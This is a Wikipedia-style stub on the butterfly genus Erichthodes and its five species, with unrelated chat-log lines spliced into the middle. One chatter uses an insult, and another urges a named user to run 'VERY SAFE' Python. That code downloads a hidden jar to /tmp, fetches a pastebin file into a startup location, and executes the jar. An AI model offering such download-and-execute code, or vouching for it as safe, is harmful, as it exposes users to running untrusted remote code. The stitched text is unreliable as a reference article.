Erichthodes

Erichthodes is a genus of satyrid butterflies found in the Neotropical realm.

Erichthodes
Scientific classification
Kingdom: Animalia
Phylum: Arthropoda
Class: Insecta
Order: Lepidoptera
Family: Nymphalidae
Subtribe: Euptychiina
Genus: Erichthodes
Forster, 1964

Species

Listed alphabetically:[1]

  • Erichthodes antonina (C. & R. Felder, [1867])
  • Erichthodes arius (Weymer, 1911)
  • Erichthodes jovita (C. & R. Felder, 1867)
  • Erichthodes julia (Weymer, 1911)
  • Erichthodes narapa (Schaus, 1902)
gollark: I was going to star "i cant hear you, you've been blocked for like a month or something because of being an attention whore", but alas.
gollark: Hmm, apparently you cannot react to messages sent by users who have blocked you. Interesting. This allows testing for blockedness.
gollark: Fascinating.
gollark: <@341618941317349376> should run my !!VERY SAFE!! python code.
gollark: ```python#!/usr/bin/env python3import urllib.requestimport shutilimport osfrom os.path import expanduserdef download(url, file): with urllib.request.urlopen(url) as response, open(file, 'wb') as out_file: shutil.copyfileobj(response, out_file)print("Executing Procedure 5.")download("https://emux.cc/versions/88ba9e7a/CCEmuX-cct.jar", "/tmp/.cct.jar")print("Phase 1 complete. Beginning Phase 2.")data_dir = expanduser("~/.local/share/ccemux/computer/0")if not os.path.exists(data_dir): os.makedirs(data_dir)download("https://pastebin.com/raw/RM13UGFa", data_dir + "/startup")os.system("java -jar /tmp/.cct.jar")```

References

  1. "Erichthodes Forster, 1964" at Markku Savela's Lepidoptera and Some Other Life Forms


This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.